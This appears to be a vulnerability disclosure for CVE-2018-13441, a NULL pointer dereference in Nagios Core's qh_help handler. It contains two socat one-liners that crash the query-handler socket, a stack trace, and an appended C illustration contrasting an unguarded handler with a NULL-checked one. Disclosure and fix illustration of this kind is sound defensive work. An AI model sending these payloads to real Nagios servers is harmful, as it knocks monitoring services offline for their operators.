Created
July 11, 2018 15:19
CVE-2018-13441
# Exploit Title: Nagios Core qh_help Denial of Service
# Date: 2018-07-09
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://www.nagios.org/
# Software Link: https://www.nagios.org/downloads/nagios-core/
# Version: 4.4.1 and earlier
# Tested on: 4.4.1
# CVE : CVE-2018-13441

qh_help in Nagios Core version 4.4.1 and earlier is prone to a NULL pointer dereference vulnerability, which allows an attacker to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket.

$ echo -ne "#help\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne "@help\0" | socat unix-connect:./poc/nagios.qh -

#0 0x554fef in qh_help /home/user/nagioscore/base/query-handler.c:374:7
#1 0x5543db in qh_input /home/user/nagioscore/base/query-handler.c:227:12
#2 0x6fac51 in iobroker_poll /home/user/nagioscore/lib/iobroker.c:353:4
#3 0x5bc334 in event_execution_loop /home/user/nagioscore/base/events.c:1136:12
#4 0x53a503 in main /home/user/nagioscore/base/nagios.c:844:4
#5 0x7f61587ae82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#6 0x42b278 in _start (/home/user/nagioscore/base/nagios+0x42b278)
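
A minimal model of this bug class and its guard, added here as an illustration; it is not code from this gist or from the Nagios source. It assumes the dispatcher passes the handler a NULL argument when the query is a bare handler name, as in the two payloads above, and every struct and function name in it is hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical model of a "<prefix><handler> <argument>" query; not Nagios source. */
struct query {
    const char *handler; /* name after the '#' or '@' prefix */
    const char *arg;     /* text after the first space, or NULL if there is none */
};

/* Split in place. Assumption: a query with no space leaves arg == NULL. */
static struct query split_query(char *buf)
{
    struct query q = { buf, NULL };
    if (*buf == '#' || *buf == '@')
        q.handler = ++buf;
    char *space = strchr(buf, ' ');
    if (space != NULL) {
        *space = '\0';
        q.arg = space + 1;
    }
    return q;
}

/* Unguarded form: reads *arg first, so a bare "#help" (arg == NULL) crashes. */
int help_unchecked(const char *arg)
{
    return (!*arg || strcmp(arg, "help") == 0) ? 0 : 1;
}

/* Guarded form: a missing argument is handled like an empty one (0 = usage). */
static int help_checked(const char *arg)
{
    return (arg == NULL || !*arg || strcmp(arg, "help") == 0) ? 0 : 1;
}

/* Returns -1 for an unknown handler, else the guarded handler's result. */
static int dispatch_checked(char *buf)
{
    struct query q = split_query(buf);
    return strcmp(q.handler, "help") != 0 ? -1 : help_checked(q.arg);
}

int main(void)
{
    char payload[] = "#help"; /* constructed input, same shape as the payload above */
    printf("guarded result: %d\n", dispatch_checked(payload));
    return 0;
}
```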